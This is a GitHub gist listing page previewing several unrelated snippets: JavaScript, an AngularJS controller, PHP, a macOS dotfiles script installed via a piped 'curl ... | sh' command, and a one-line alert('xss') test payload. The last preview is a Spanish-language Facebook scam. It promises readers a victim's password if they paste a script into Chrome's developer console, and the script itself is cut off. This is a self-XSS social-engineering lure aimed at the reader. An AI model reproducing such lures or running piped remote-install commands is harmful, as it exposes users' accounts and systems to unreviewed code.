This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*var petitions = [ | |
| { | |
| id: 1, | |
| }, | |
| { | |
| id: 2 | |
| }, | |
| { | |
| id: 3 | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env sh | |
| ## | |
| # This is script with usefull tips taken from: | |
| # https://github.com/mathiasbynens/dotfiles/blob/master/.osx | |
| # | |
| # install it: | |
| # curl -sL https://raw.github.com/gist/2108403/hack.sh | sh | |
| # |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| shiftsApp.factory('shiftData', function shiftDataFactory() { | |
| return {}; | |
| }); | |
| //Paso selección vehículo | |
| shiftsApp.controller('VehicleController', function ($scope, shiftData) { | |
| $scope.setVehicle = function (id) { | |
| shiftData.vehicle_id = id; | |
| console.log(shiftData); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // Una alternativa | |
| $flavors1 = [ 'chocolate', 'strawberry', 'vanilla', | |
| 'chocolate chip', 'mint chocolate chip', 'rocky road', | |
| 'cookie dough', 'peach', 'fudge brownie', | |
| 'coffee', 'mocha chip' ]; | |
| class PeopleController extends AppController { | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert('xss'); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Amigos de facebook he descubierto una vulnerabilidad en facebook, | |
| entren al facebook de la persona que quieren hackear, deben usar chrome | |
| presioenen f12 donde dice consola pegen el el script que les dejo aqui: | |
| peguenlo en el consola y listo les llegara el pasword de la persona a su correo con el que estes registrado en facebook... | |
| Presionen Control + V para pegan en la consola | |
| este es es script: | |
| /* Nh?c */ |
NewerOlder